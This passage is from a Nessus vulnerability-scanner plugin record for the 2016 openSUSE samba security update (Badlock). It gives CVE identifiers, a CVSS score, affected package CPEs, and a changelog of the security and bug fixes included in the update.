libs\n package; (boo#913547).\n\n - Rebase File Server Remote VSS Protocol (FSRVP) server\n against 4.2.0rc1; (fate#313346).", "edition": 20, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2016-04-18T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-2016-462) (Badlock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5330", "CVE-2016-2112", "CVE-2016-2118", "CVE-2015-3223", "CVE-2015-7560", "CVE-2015-5296", "CVE-2015-8467", "CVE-2015-5252", "CVE-2016-2110", "CVE-2016-2113", "CVE-2015-0240", "CVE-2016-2115", "CVE-2014-8143", "CVE-2015-5370", "CVE-2015-5299", "CVE-2016-2111"], "modified": "2016-04-18T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo", "p-cpe:/a:novell:opensuse:samba-python-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libregistry0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libgensec0", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw0", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libregistry-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libgensec-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-pidl", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test-devel", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:samba-python", "p-cpe:/a:novell:opensuse:ctdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libsmbldap0-32bit", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2016-462.NASL", "href": "https://www.tenable.com/plugins/nessus/90558", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-462.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90558);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-8143\", \"CVE-2015-0240\", \"CVE-2015-3223\", \"CVE-2015-5252\", \"CVE-2015-5296\", \"CVE-2015-5299\", \"CVE-2015-5330\", \"CVE-2015-5370\", \"CVE-2015-7560\", \"CVE-2015-8467\", \"CVE-2016-2110\", \"CVE-2016-2111\", \"CVE-2016-2112\", \"CVE-2016-2113\", \"CVE-2016-2115\", \"CVE-2016-2118\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2016-462) (Badlock)\");\n script_summary(english:\"Check for the openSUSE-2016-462 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"samba was updated to version 4.2.4 to fix 14 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-5370: DCERPC server and client were vulnerable\n to DOS and MITM attacks (bsc#936862).\n\n - CVE-2016-2110: A man-in-the-middle could have downgraded\n NTLMSSP authentication (bsc#973031).\n\n - CVE-2016-2111: Domain controller netlogon member\n computer could have been spoofed (bsc#973032).\n\n - CVE-2016-2112: LDAP conenctions were vulnerable to\n downgrade and MITM attack (bsc#973033).\n\n - CVE-2016-2113: TLS certificate validation were missing\n (bsc#973034).\n\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM\n attacks (bsc#973036).\n\n - CVE-2016-2118: 'Badlock' DCERPC impersonation of\n authenticated account were possible (bsc#971965).\n\n - CVE-2015-3223: Malicious request can cause Samba LDAP\n server to hang, spinning using CPU (boo#958581).\n\n - CVE-2015-5330: Remote read memory exploit in LDB\n (boo#958586).\n\n - CVE-2015-5252: Insufficient symlink verification (file\n access outside the share)(boo#958582).\n\n - CVE-2015-5296: No man in the middle protection when\n forcing smb encryption on the client side (boo#958584).\n\n - CVE-2015-5299: Currently the snapshot browsing is not\n secure thru windows previous version (shadow_copy2)\n (boo#958583).\n\n - CVE-2015-8467: Fix Microsoft MS15-096 to prevent machine\n accounts from being changed into user accounts\n (boo#958585).\n\n - CVE-2015-7560: Getting and setting Windows ACLs on\n symlinks can change permissions on link target\n (boo#968222).\n\nThese non-security issues were fixed :\n\n - Fix samba.tests.messaging test and prevent potential tdb\n corruption by removing obsolete now invalid tdb_close\n call; (boo#974629).\n\n - Align fsrvp feature sources with upstream version.\n\n - Obsolete libsmbsharemodes0 from samba-libs and\n libsmbsharemodes-devel from samba-core-devel;\n (boo#973832).\n\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry\n on a filesystem with no ACL support; (bso#10489).\n\n - docs: Add example for domain logins to smbspool man\n page; (bso#11643).\n\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n\n - loadparm: Fix memory leak issue; (bso#11708).\n\n - lib/tsocket: Work around sockets not supporting\n FIONREAD; (bso#11714).\n\n - ctdb-scripts: Drop use of 'smbcontrol winbindd\n ip-dropped ...'; (bso#11719).\n\n - s3:smbd:open: Skip redundant call to file_set_dosmode\n when creating a new file; (bso#11727).\n\n - param: Fix str_list_v3 to accept ';' again; (bso#11732).\n\n - Real memeory leak(buildup) issue in loadparm;\n (bso#11740).\n\n - Obsolete libsmbclient from libsmbclient0 and\n libpdb-devel from libsamba-passdb-devel while not\n providing it; (boo#972197).\n\n - Upgrade on-disk FSRVP server state to new version;\n (boo#924519).\n\n - Only obsolete but do not provide gplv2/3 package names;\n (boo#968973).\n\n - Enable clustering (CTDB) support; (boo#966271).\n\n - s3: smbd: Fix timestamp rounding inside SMB2 create;\n (bso#11703); (boo#964023).\n\n - vfs_fruit: Fix renaming directories with open files;\n (bso#11065).\n\n - Fix MacOS finder error 36 when copying folder to Samba;\n (bso#11347).\n\n - s3:smbd/oplock: Obey kernel oplock setting when\n releasing oplocks; (bso#11400).\n\n - Fix copying files with vfs_fruit when using\n vfs_streams_xattr without stream prefix and type suffix;\n (bso#11466).\n\n - s3:libsmb: Correctly initialize the list head when\n keeping a list of primary followed by DFS connections;\n (bso#11624).\n\n - Reduce the memory footprint of empty string options;\n (bso#11625).\n\n - lib/async_req: Do not install async_connect_send_test;\n (bso#11639).\n\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n\n - smbd: make 'hide dot files' option work with 'store dos\n attributes = yes'; (bso#11645).\n\n - smbcacls: Fix uninitialized variable; (bso#11682).\n\n - s3:smbd: Ignore initial allocation size for directory\n creation; (bso#11684).\n\n - Changing log level of two entries to from 1 to 3;\n (bso#9912).\n\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n\n - wafsamba: Also build libraries with RELRO protection;\n (bso#11346).\n\n - ctdb: Strip trailing spaces from nodes file;\n (bso#11365).\n\n - s3-smbd: Fix old DOS client doing wildcard delete -\n gives a attribute type of zero; (bso#11452).\n\n - nss_wins: Do not run into use after free issues when we\n access memory allocated on the globals and the global\n being reinitialized; (bso#11563).\n\n - async_req: Fix non-blocking connect(); (bso#11564).\n\n - auth: gensec: Fix a memory leak; (bso#11565).\n\n - lib: util: Make non-critical message a warning;\n (bso#11566).\n\n - Fix winbindd crashes with samlogon for trusted domain\n user; (bso#11569); (boo#949022).\n\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n\n - ctdb: Open the RO tracking db with perms 0600 instead of\n 0000; (bso#11577).\n\n - manpage: Correct small typo error; (bso#11584).\n\n - s3: smbd: If EA's are turned off on a share don't allow\n an SMB2 create containing them; (bso#11589).\n\n - Backport some valgrind fixes from upstream master;\n (bso#11597).\n\n - s3: smbd: have_file_open_below() fails to enumerate open\n files below an open directory handle; (bso#11615).\n\n - docs: Fix some typos in the idmap config section of man\n 5 smb.conf; (bso#11619).\n\n - Remove redundant configure options while adding\n with-relro.\n\n - s3: smbd: Fix our access-based enumeration on 'hide\n unreadable' to match Windows; (bso#10252).\n\n - smbd: Fix file name buflen and padding in notify\n repsonse; (bso#10634).\n\n - kerberos: Make sure we only use prompter type when\n available; (bso#11038).\n\n - s3:ctdbd_conn: Make sure we destroy tevent_fd before\n closing the socket; (bso#11316).\n\n - dcerpc.idl: accept invalid dcerpc_bind_nak pdus;\n (bso#11327).\n\n - Fix a deadlock in tdb; (bso#11381).\n\n - s3: smbd: Fix mkdir race condition; (bso#11486).\n\n - pam_winbind: Fix a segfault if initialization fails;\n (bso#11502).\n\n - s3: dfs: Fix a crash when the dfs targets are disabled;\n (bso#11509).\n\n - s3: smbd: Fix opening/creating :stream files on the root\n share directory; (bso#11522).\n\n - net: Fix a crash with 'net ads keytab create';\n (bso#11528).\n\n - s3: smbd: Fix a crash in unix_convert() and a NULL\n pointer bug introduced by previous 'raw' stream fix\n (bso#11522); (bso#11535).\n\n - vfs_fruit: Return value of ad_pack in vfs_fruit.c;\n (bso#11543).\n\n - vfs_commit: Set the fd on open before calling\n SMB_VFS_FSTAT; (bso#11547).\n\n - Fix bug in smbstatus where the lease info is not\n printed; (bso#11549).\n\n - s3:smbstatus: Add stream name to share_entry_forall();\n (bso#11550).\n\n - Relocate the tmpfiles.d directory to the client package;\n (boo#947552).\n\n - Do not provide libpdb0 from libsamba-passdb0 but add it\n to baselibs.conf instead; (boo#942716).\n\n - Package /var/lib/samba/private/sock with 0700\n permissions; (boo#946051).\n\n - auth/credentials: If credentials have principal set,\n they are not anonymous anymore; (bso#11265).\n\n - Fix stream names with colon with 'fruit:encoding =\n native'; (bso#11278).\n\n - s4:rpc_server/netlogon: Fix for NetApp; (bso#11291).\n\n - lib: Fix rundown of open_socket_out(); (bso#11316).\n\n - s3:lib: Fix some corner cases of\n open_socket_out_cleanup(); (bso#11316).\n\n - vfs:fruit: Implement copyfile style copy_chunk;\n (bso#11317).\n\n - ctdb-daemon: Return correct sequence number for\n CONTROL_GET_DB_SEQNUM; (bso#11398).\n\n - ctdb-scripts: Support monitoring of interestingly named\n VLANs on bonds; (bso#11399).\n\n - ctdb-daemon: Improve error handling for running event\n scripts; (bso#11431).\n\n - ctdb-daemon: Check if updates are in flight when\n releasing all IPs; (bso#11432).\n\n - ctdb-build: Fix building of PCP PMDA module;\n (bso#11435).\n\n - Backport dcesrv_netr_DsRGetDCNameEx2 fixes; (bso#11454).\n\n - vfs_fruit: Handling of empty resource fork; (bso#11467).\n\n - Avoid quoting problems in user's DNs; (bso#11488).\n\n - s3-auth: Fix 'map to guest = Bad uid'; (bso#9862).\n\n - s4:lib/tls: Fix build with gnutls 3.4; (bso#8780).\n\n - s4.2/fsmo.py: Fixed fsmo transfer exception;\n (bso#10924).\n\n - winbindd: Sync secrets.ldb into secrets.tdb on startup;\n (bso#10991).\n\n - Logon via MS Remote Desktop hangs; (bso#11061).\n\n - s3: lib: util: Ensure we read a hex number as %x, not\n %u; (bso#11068).\n\n - tevent: Add a note to tevent_add_fd(); (bso#11141).\n\n - s3:param/loadparm: Fix 'testparm --show-all-parameters';\n (bso#11170).\n\n - s3-unix_msg: Remove socket file after closing socket fd;\n (bso#11217).\n\n - smbd: Fix a use-after-free; (bso#11218); (boo#919309).\n\n - s3-rpc_server: Fix rpc_create_tcpip_sockets() processing\n of interfaces; (bso#11245).\n\n - s3:smb2: Add padding to last command in compound\n requests; (bso#11277).\n\n - Add IPv6 support to ADS client side LDAP connects;\n (bso#11281).\n\n - Add IPv6 support for determining FQDN during ADS join;\n (bso#11282).\n\n - s3: IPv6 enabled DNS connections for ADS client;\n (bso#11283).\n\n - Fix invalid write in ctdb_lock_context_destructor;\n (bso#11293).\n\n - Excessive cli_resolve_path() usage can slow down\n transmission; (bso#11295).\n\n - vfs_fruit: Add option 'veto_appledouble'; (bso#11305).\n\n - tstream: Make socketpair nonblocking; (bso#11312).\n\n - idmap_rfc2307: Fix wbinfo '--gid-to-sid' query;\n (bso#11313).\n\n - Group creation: Add msSFU30Name only when --nis-domain\n was given; (bso#11315).\n\n - tevent_fd needs to be destroyed before closing the fd;\n (bso#11316).\n\n - Build fails on Solaris 11 with\n '&lsquo;PTHREAD_MUTEX_ROBUST&rsquo; undeclared';\n (bso#11319).\n\n - smbd/trans2: Add a useful diagnostic for files with bad\n encoding; (bso#11323).\n\n - Change sharesec output back to previous format;\n (bso#11324).\n\n - Robust mutex support broken in 1.3.5; (bso#11326).\n\n - Kerberos auth info3 should contain resource group ids\n available from pac_logon; winbindd:\n winbindd_raw_kerberos_login - ensure logon_info exists\n in PAC; (bso#11328); (boo#912457).\n\n - s3:smb2_setinfo: Fix memory leak in the defer_rename\n case; (bso#11329).\n\n - tevent: Fix CID 1035381 Unchecked return value;\n (bso#11330).\n\n - tdb: Fix CID 1034842 and 1034841 Resource leaks;\n (bso#11331).\n\n - s3: smbd: Use separate flag to track\n become_root()/unbecome_root() state; (bso#11339).\n\n - s3: smbd: Codenomicon crash in do_smb_load_module();\n (bso#11342).\n\n - pidl: Make the compilation of PIDL producing the same\n results if the content hasn't change; (bso#11356).\n\n - winbindd: Disconnect child process if request is\n cancelled at main process; (bso#11358).\n\n - vfs_fruit: Check offset and length for AFP_AfpInfo read\n requests; (bso#11363).\n\n - docs: Overhaul the description of 'smb encrypt' to\n include SMB3 encryption; (bso#11366).\n\n - s3:auth_domain: Fix talloc problem in\n connect_to_domain_password_server(); (bso#11367).\n\n - ncacn_http: Fix GNUism; (bso#11371).\n\n - Backport changes to use resource group sids obtained\n from pac logon_info; (bso#11328); (boo#912457).\n\n - Order winbind.service Before and Want nss-user-lookup\n target.\n\n - s3:smbXsrv: refactor duplicate code into\n smbXsrv_session_clear_and_logoff(); (bso#11182).\n\n - gencache: don't fail gencache_stabilize if there were\n records to delete; (bso#11260).\n\n - s3: libsmbclient: After getting attribute server, ensure\n main srv pointer is still valid; (bso#11186).\n\n - s4: rpc: Refactor dcesrv_alter() function into setup and\n send steps; (bso#11236).\n\n - s3: smbd: Incorrect file size returned in the response\n of 'FILE_SUPERSEDE Create'; (bso#11240).\n\n - Mangled names do not work with acl_xattr; (bso#11249).\n\n - nmbd rewrites browse.dat when not required; (bso#11254).\n\n - vfs_fruit: add option 'nfs_aces' that controls the NFS\n ACEs stuff; (bso#11213).\n\n - s3:smbd: Add missing tevent_req_nterror; (bso#11224).\n\n - vfs: kernel_flock and named streams; (bso#11243).\n\n - vfs_gpfs: Error code path doesn't call END_PROFILE;\n (bso#11244).\n\n - s4: libcli/finddcs_cldap: continue processing CLDAP\n until all addresses are used; (bso#11284).\n\n - ctdb: check for talloc_asprintf() failure; (bso#11201).\n\n - spoolss: purge the printer name cache on name change;\n (bso#11210); (boo#901813).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - vfs_fruit: also map characters below 0x20; (bso#11221).\n\n - ctdb: Coverity fix for CID 1291643; (bso#11201).\n\n - Multiplexed RPC connections are not handled by DCERPC\n server; (bso#11225).\n\n - Fix terminate connection behavior for asynchronous\n endpoint with PUSH notification flavors; (bso#11226).\n\n - ctdb-scripts: Fix bashism in ctdbd_wrapper script;\n (bso#11007).\n\n - ctdb: Fix CIDs 1125615, 1125634, 1125613, 1288201 and\n 1125553; (bso#11201).\n\n - SMB2 should cancel pending NOTIFY calls with\n DELETE_PENDING if the directory is deleted; (bso#11257).\n\n - s3:winbindd: make sure we remove pending io requests\n before closing client\n\n - 'sharesec' output no longer matches input format;\n (bso#11237).\n\n - waf: Fix systemd detection; (bso#11200).\n\n - CTDB: Fix portability issues; (bso#11202).\n\n - CTDB: Fix some IPv6-related issues; (bso#11203).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - 'net ads dns gethostbyname' crashes with an error in\n TALLOC_FREE if you enter invalid values; (bso#11234).\n\n - libads: record service ticket endtime for sealed ldap\n connections;\n\n - lib/util: Include DEBUG macro in internal header files\n before samba_util.h; (bso#11033).\n\n - Initialize dwFlags field of DNS_RPC_NODE structure;\n (bso#9791).\n\n - s3: lib: ntlmssp: If NTLMSSP_NEGOTIATE_TARGET_INFO isn't\n set, cope with servers that don't send the 2 unused\n fields; (bso#10016).\n\n - build:wafadmin: Fix use of spaces instead of tabs;\n (bso#10476).\n\n - waf: Fix the build on openbsd; (bso#10476).\n\n - s3: client: 'client use spnego principal = yes' code\n checks wrong name;\n\n - spoolss: Retrieve published printer GUID if not in\n registry; (bso#11018).\n\n - vfs_fruit: Enhance handling of malformed AppleDouble\n files; (bso#11125).\n\n - backupkey: Explicitly link to gnutls and gcrypt;\n (bso#11135).\n\n - replace: Remove superfluous check for gcrypt header;\n (bso#11135).\n\n - Backport subunit changes; (bso#11137).\n\n - libcli/auth: Match Declaration of\n netlogon_creds_cli_context_tmp with implementation;\n (bso#11140).\n\n - s3-winbind: Fix cached user group lookup of trusted\n domains; (bso#11143).\n\n - talloc: Version 2.1.2; (bso#11144).\n\n - Update libwbclient version to 0.12; (bso#11149).\n\n - brlock: Use 0 instead of empty initializer list;\n (bso#11153).\n\n - s4:auth/gensec_gssapi: Let gensec_gssapi_update() return\n\n - backupkey: Use ndr_pull_struct_blob_all(); (bso#11174).\n\n - Fix lots of winbindd zombie processes on Solaris\n platform; (bso#11175).\n\n - Prevent samba package updates from disabling samba\n kerberos printing.\n\n - Add sparse file support for samba; (fate#318424).\n\n - Simplify libxslt build requirement and README.SUSE\n install.\n\n - Remove no longer required cleanup steps while populating\n the build root.\n\n - smbd: Stop using vfs_Chdir after SMB_VFS_DISCONNECT;\n (bso#1115).\n\n - pam_winbind: fix warn_pwd_expire implementation;\n (bso#9056).\n\n - nsswitch: Fix soname of linux nss_*.so.2 modules;\n (bso#9299).\n\n - Make 'profiles' work again; (bso#9629).\n\n - s3:smb2_server: protect against integer wrap with 'smb2\n max credits = 65535'; (bso#9702).\n\n - Make validate_ldb of String(Generalized-Time) accept\n millisecond format '.000Z'; (bso#9810).\n\n - Use -R linker flag on Solaris, not -rpath; (bso#10112).\n\n - vfs: Add glusterfs manpage; (bso#10240).\n\n - Make 'smbclient' use cached creds; (bso#10279).\n\n - pdb: Fix build issues with shared modules; (bso#10355).\n\n - s4-dns: Add support for BIND 9.10; (bso#10620).\n\n - idmap: Return the correct id type to *id_to_sid methods;\n (bso#10720).\n\n - printing/cups: Pack requested-attributes with\n IPP_TAG_KEYWORD; (bso#10808).\n\n - Don't build vfs_snapper on FreeBSD; (bso#10834).\n\n - nss_winbind: Add getgroupmembership for FreeBSD;\n (bso#10835).\n\n - idmap_rfc2307: Fix a crash after connection problem to\n DC; (bso#10837).\n\n - s3: smb2cli: query info return length check was\n reversed; (bso#10848).\n\n - s3: lib, s3: modules: Fix compilation on Solaris;\n (bso#10849).\n\n - lib: uid_wrapper: Fix setgroups and syscall detection on\n a system without native uid_wrapper library;\n (bso#10851).\n\n - winbind3: Fix pwent variable substitution; (bso#10852).\n\n - Improve samba-regedit; (bso#10859).\n\n - registry: Don't leave dangling transactions;\n (bso#10860).\n\n - Fix build of socket_wrapper on systems without\n SO_PROTOCOL; (bso#10861).\n\n - build: Do not install 'texpect' binary anymore;\n (bso#10862).\n\n - Fix testparm to show hidden share defaults; (bso#10864).\n\n - libcli/smb: Fix smb2cli_validate_negotiate_info with\n min=PROTOCOL_NT1 max=PROTOCOL_SMB2_02; (bso#10866).\n\n - Integrate CTDB into top-level Samba build; (bso#10892).\n\n - samba-tool group add: Add option '--nis-domain' and\n '--gid'; (bso#10895).\n\n - s3-nmbd: Fix netbios name truncation; (bso#10896).\n\n - spoolss: Fix handling of bad EnumJobs levels;\n (bso#10898).\n\n - Fix smbclient loops doing a directory listing against\n Mac OS X 10 server with a non-wildcard path;\n (bso#10904).\n\n - Fix print job enumeration; (bso#10905); (boo#898031).\n\n - samba-tool: Create NIS enabled users and\n unixHomeDirectory attribute; (bso#10909).\n\n - Add support for SMB2 leases; (bso#10911).\n\n - btrfs: Don't leak opened directory handle; (bso#10918).\n\n - s3: nmbd: Ensure NetBIOS names are only 15 characters\n stored; (bso#10920).\n\n - s3:smbd: Fix file corruption using 'write cache size !=\n 0'; (bso#10921).\n\n - pdb_tdb: Fix a TALLOC/SAFE_FREE mixup; (bso#10932).\n\n - s3-keytab: fix keytab array NULL termination;\n (bso#10933).\n\n - s3:passdb: fix logic in pdb_set_pw_history();\n (bso#10940).\n\n - Cleanup add_string_to_array and usage; (bso#10942).\n\n - dbwrap_ctdb: Pass on mutex flags to tdb_open;\n (bso#10942).\n\n - Fix RootDSE search with extended dn control;\n (bso#10949).\n\n - Fix 'samba-tool dns serverinfo <server>' for IPv6;\n (bso#10952).\n\n - libcli/smb: only force signing of smb2 session setups\n when binding a new session; (bso#10958).\n\n - s3-smbclient: Return success if we listed the shares;\n (bso#10960).\n\n - s3-smbstatus: Fix exit code of profile output;\n (bso#10961).\n\n - socket_wrapper: Add missing prototype check for eventfd;\n (bso#10965).\n\n - libcli: SMB2: Pure SMB2-only negprot fix to make us\n behave as a Windows client does; (bso#10966).\n\n - vfs_streams_xattr: Check stream type; (bso#10971).\n\n - s3: smbd: Fix *allocate* calls to follow POSIX error\n return convention; (bso#10982).\n\n - vfs_fruit: Add support for AAPL; (bso#10983).\n\n - Fix spoolss IDL response marshalling when returning\n error without clearing info; (bso#10984).\n\n - dsdb-samldb: Check for extended access rights before we\n allow changes to userAccountControl; (bso#10993);\n CVE-2014-8143; (boo#914279).\n\n - Fix IPv6 support in CTDB; (bso#10996).\n\n - ctdb-daemon: Use correct tdb flags when enabling robust\n mutex support; (bso#11000).\n\n - vfs_streams_xattr: Add missing call to\n SMB_VFS_NEXT_CONNECT; (bso#11005).\n\n - s3-util: Fix authentication with long hostnames;\n (bso#11008).\n\n - ctdb-build: Fix build without xsltproc; (bso#11014).\n\n - packaging: Include CTDB man pages in the tarball;\n 